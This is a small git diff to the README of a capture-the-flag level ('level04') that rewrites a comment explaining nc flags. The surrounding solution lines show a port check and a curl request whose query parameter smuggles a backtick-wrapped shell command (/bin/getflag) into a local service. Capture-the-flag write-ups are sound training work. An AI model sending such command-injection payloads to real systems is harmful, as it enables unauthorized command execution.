diff --git a/level04/README.mdx b/level04/README.mdx index e07e27a..03a059c 100644 --- a/level04/README.mdx +++ b/level04/README.mdx @@ -35,7 +35,8 @@ Solution ```b > nc -vz localhost 4747 - ^ v: verbose, z: scan if a port is open (scanning listening daemons) + ^ v: verbose + z: scan if a port is open (scanning listening daemons) Connection to localhost 4747 port [tcp/*] succeeded! > curl localhost:4747/?x="\`/bin/getflag\`"